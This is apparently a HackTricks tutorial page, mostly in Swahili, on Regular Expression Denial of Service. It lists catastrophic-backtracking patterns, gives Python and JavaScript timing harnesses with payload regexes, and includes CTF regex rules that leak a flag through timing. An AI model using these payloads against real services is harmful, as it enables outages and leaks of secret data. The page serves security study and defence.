Regular expression Denial of Service - ReDoS

Reading time: 7 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Regular Expression Denial of Service (ReDoS)

Hali ya Regular Expression Denial of Service (ReDoS) hutokea wakati mtu anachukua faida ya udhaifu katika jinsi regular expressions (njia ya kutafuta na kulinganisha mifumo ndani ya maandishi) zinavyofanya kazi. Wakati mwingine, wakati regular expressions zinapotumika, zinaweza kuwa polepole sana, hasa ikiwa kipande cha maandishi zinachofanyia kazi kinapokua. Upole huo unaweza kuwa mbaya kiasi kwamba unakua kwa haraka sana hata kwa ongezeko dogo la ukubwa wa maandishi. Wadukuzi wanaweza kutumia tatizo hili kufanya programu inayotumia regular expressions isifanye kazi vizuri kwa muda mrefu.

The Problematic Regex Naïve Algorithm

Check the details in https://owasp.org/www-community/attacks/Regularexpression_Denial_of_Service-_ReDoS

Tabia za engine na uwezekano wa kutumiwa kwa shambulio

  • Most popular engines (PCRE, Java java.util.regex, Python re, JavaScript RegExp) zinatumia VM ya backtracking. Vingizo vilivyotengenezwa vinavyosababisha njia nyingi zinazofanana za kulinganisha subpattern vinalazimisha backtracking ya eksponentiali au ya polynomial ya daraja kubwa.
  • Baadhi ya engines/libraries zimetengenezwa kuwa ReDoS-resilient kwa muundo (hakuna backtracking), mfano RE2 na ports zinazotumia finite automata ambazo hutoa wakati wa mstari katika hali mbaya kabisa; kuzitumia kwa input zisizotegemewa huondoa primitive ya DoS ya backtracking. Angalia marejeo mwishoni kwa maelezo.

Regex Hatari

Pattern ya regular expression hatari ni ile inayoweza kushikwa na input iliyotengenezwa (crafted) ikisababisha DoS. Patterns hatari za regex kwa kawaida zina grouping zenye repetition na kurudia au alternation zenye overlapping ndani ya kundi linalorudiwa. Baadhi ya mifano ya patterns hatari ni:

  • (a+)+
  • ([a-zA-Z]+)*
  • (a|aa)+
  • (a|a?)+
  • (.*a){x} for x > 10

Yote hayo yana udhaifu kwa input aaaaaaaaaaaaaaaaaaaaaaaa!.

Mwongozo wa vitendo wa kujenga PoCs

Mengi ya matukio mabaya huwa na muundo kama huu:

  • Prefix inayokupeleka katika subpattern zilizo hatarini (hiari).
  • Msururu mrefu wa karakteri unaosababisha matches za utata ndani ya quantifiers zilizofungwa/zinazoingiliana (mf., a nyingi, _, au nafasi).
  • Karakteri ya mwisho inayofanya jumla kushindwa ili engine ilazimike kufanya backtrack kupitia uwezekano wote (mara nyingi karakteri ambayo haitafanana na tokeni ya mwisho, kama !).

Mifano ya msingi:

  • (a+)+$ vs input "a"*N + "!"
  • \w*_*\w*$ vs input "v" + "_"*N + "!"

Ongeza N na uchunguze ukuaji wa super‑linear.

Harakati ya upimaji wa muda (Python)

python
import re, time
pat = re.compile(r'(\w*_)\w*$')
for n in [2**k for k in range(8, 15)]:
s = 'v' + '_'*n + '!'
t0=time.time(); pat.search(s); dt=time.time()-t0
print(n, f"{dt:.3f}s")

ReDoS Payloads

String Exfiltration via ReDoS

Katika CTF (au bug bounty) labda wewe unadhibiti Regex ambayo taarifa nyeti (the flag) inalingana nayo. Kisha, inaweza kuwa muhimu kusababisha ukurasa uzime (timeout au muda mrefu zaidi wa usindikaji) ikiwa Regex matched na sio ikiwa haikutokea. Kwa njia hii utaweza exfiltrate string hiyo herufi kwa herufi:

  • Katika this post you can find this ReDoS rule: ^(?=<flag>)((.*)*)*salt$
  • Mfano: ^(?=HTB{sOmE_fl§N§)((.*)*)*salt$
  • Katika this writeup you can find this one:<flag>(((((((.*)*)*)*)*)*)*)!
  • Katika this writeup he used: ^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$

ReDoS Controlling Input and Regex

Zifuatazo ni mifano ya ReDoS ambapo unadhibiti pande zote, yaani input na regex:

javascript
function check_time_regexp(regexp, text) {
var t0 = new Date().getTime()
new RegExp(regexp).test(text)
var t1 = new Date().getTime()
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}

// This payloads work because the input has several "a"s
;[
//  "((a+)+)+$",  //Eternal,
//  "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$", //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach((regexp) => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))

/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/

Maelezo ya lugha/muhimili kwa washambuliaji

  • JavaScript (browser/Node): Built‑in RegExp ni backtracking engine na mara nyingi inaweza kutumika ikiwa regex+input vinaratibiwa na mshambuliaji.
  • Python: re ni backtracking. Mfululizo mrefu wa utata pamoja na tail inayoshindwa mara nyingi husababisha catastrophic backtracking.
  • Java: java.util.regex ni backtracking. Ikiwa unadhibiti tu input, angalia endpoints zinazotumia complex validators; ikiwa unadhibiti patterns (mfano, stored rules), ReDoS kawaida ni rahisi.
  • Engines such as RE2/RE2J/RE2JS or the Rust regex crate zimeundwa kuepuka catastrophic backtracking. Ikiwa unakutana nazo, zingatia vizingiti vingine (mfano, enormous patterns) au tafuta components zinazotumia backtracking engines.

Vifaa

Tip: Ukiwa unadhibiti tu input, tengeneza strings zenye urefu unaozidisha mara mbili (mfano, 2^k characters) na fuatilia latency. Ukuaji wa exponential unaonyesha kwa nguvu hali inayoweza kuleta ReDoS.

Marejeleo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks